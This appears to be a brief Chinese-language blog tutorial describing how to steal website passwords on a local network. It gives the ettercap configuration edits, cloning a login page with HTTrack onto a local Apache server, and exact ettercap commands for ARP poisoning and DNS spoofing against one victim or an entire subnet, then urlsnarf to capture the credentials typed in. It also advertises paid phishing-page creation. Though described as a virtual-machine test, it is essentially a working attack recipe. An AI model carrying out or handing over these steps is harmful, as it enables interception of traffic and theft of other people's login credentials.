原理:
全程都是虚拟机测试。。。。。
通过kali工具进行arp欺骗,在本机建立一个登录网站,将目标流量转移到本机网站,通过监听本机流量进行分析,查找密码。
。。。。。内容使用kali工具,安装问题看以往博客。。。。。。
ettercap的使用:
1.第一步进入/etc/ettercap/ 打开etter.conf,更改以下内容
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
2.同目录下打开etter.dns,将前面‘#’删去,eg:下图黑色字体部分,后面为自己ip地址(查看IP地址命令行输入“ifconfig”)。
第一部分完成。。。。。
在/var/www/html/中添加登录界面:
此模块较为重要,可以使用 kali中 Httrack
工具进行复刻网页。会的可以自己写网页。
eg:网页代做:1585818251 //有偿。。。。
准备完成:
1,开启apache,命令行输入: service apache2 start
2.另开命令行窗口输入:ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /要欺骗的ip// /网关的ip//
ettercap -Tq -i eth0 -M arp:remote -P dns_spoof /// /网关的ip// 这为欺骗网段所有电脑
3.urlsnarf -i eth0 //监听自己网卡,当输入密码时抓取
图中为我自己测试。。。。